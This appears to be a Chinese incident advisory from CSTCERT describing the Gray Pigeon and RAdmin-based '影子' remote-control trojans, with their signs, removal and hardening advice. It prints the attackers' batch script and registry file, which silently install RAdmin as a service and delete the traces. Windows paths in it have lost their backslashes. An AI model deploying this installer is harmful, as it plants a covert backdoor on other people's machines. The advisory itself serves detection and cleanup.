由于近期网络中各类木马出现的比较频繁，因此我们CSTCERT将网络安全事件处理过程中所遇到的一些问题和处理过程在此进行详细说明，以方便各用户网管更好的处理木马问题。

根据我们掌握的情况，目前网络中被灰鸽子和影子两种程序远程控制的机器数目较多。

一、“灰鸽子”木马的查找及特征

灰鸽子通常情况下名称为G_Server.exe，运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端。对于原始灰鸽子的具体信息可以参看：http://www.topzj.com/5/051102/32943.htm

在我们进行安全事件处理过程中发现，灰鸽子可能会被改名为internet explorer.exe，通常放在c:windows或者从c:windowssystem32下面（如图1）

作为后台服务（服务名称叫windows update）随开机启动，并且作为隐藏进程调用正常的IE程序（C:programs filesInternet exploreiexplore.exe（如：图2））,不易被人察觉，通常连接远程的8000端口(如:图3)。

二、影子-RAdmin远程控制程序特征

影子Radmin远程控制软件通常名称叫做r_server.exe，但常常被改名为Explore.exe被放到系统目录下，并添加到服务当中随系统启动。默认开放端口号为5(如图4)

其同级目录中往往同时有admDll.dll,raddrv.dll 两个文件(如图5)

有时候桌面系统栏（时钟和杀毒软件图标显示区域）通常有一个空白的图标（没有颜色，但是占据一个图表的大小），鼠标放上去显示本机IP，也表明RAdmin程序在运行(如图6)。

Radmin影子的批处理运行脚本r.bat

－－－－－－－－－－－－－－－－－－－－－－－－－－－－

@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@del red.exe
@del 1.reg
@del r.bat
@del u.bat

－－－－－－－－－－－－－－－－－－－－－－－－－－－－

注册表文件1.reg

----------------------------------------------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMRAdmin]

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0]

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Server]

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Serveriplist]

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:aa,75,e1,91,16,07,e1,bd,2b,0b,a9,36,db,fb,76,35
"Port"=hex:05,00,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

----------------------------------------------------

通常，还会有u.bat文件进行服务的停止操作。

三、处理方法

如要查看隐藏进程和网络连接以及服务情况推荐使用一些进程查看工具，如冰刃（下载地址：http://www.ttian.net/website/2005/0829/391.html），发现红色字体显示的进程即为隐藏进程，可以进行相关的处理操作。

除去木马的方法，用冰刃关掉相关系统服务，删除掉程序文件。

四、建议

由于黑客经常攻击带有SQL Server的windows 2000 server系统，因此建议用户本人将主机系统补丁升级至最新，系统密码设定为复杂性密码，同时装有SQL Server的主机，其SQL管理密码也要设置复杂密码，如无特殊需要，关闭远程桌面3389端口服务，以免遭受攻击。同时查看主机是否有可以系统用户被添加，检查IIS及事件查看器日志以便尽早发现问题，及时解决。

如果伴有主机杀毒软件无法启动或者重新安装后无效的情况，请检查系统服务中杀毒软件的服务属性的登陆页面项中的profile 1是否被禁用(如图7)；如被禁用，重新启用即可。

科技网用户网管如遇到此类事件无法解决，请及时联系CSTCERT处理。

灰鸽子 Radmin 影子版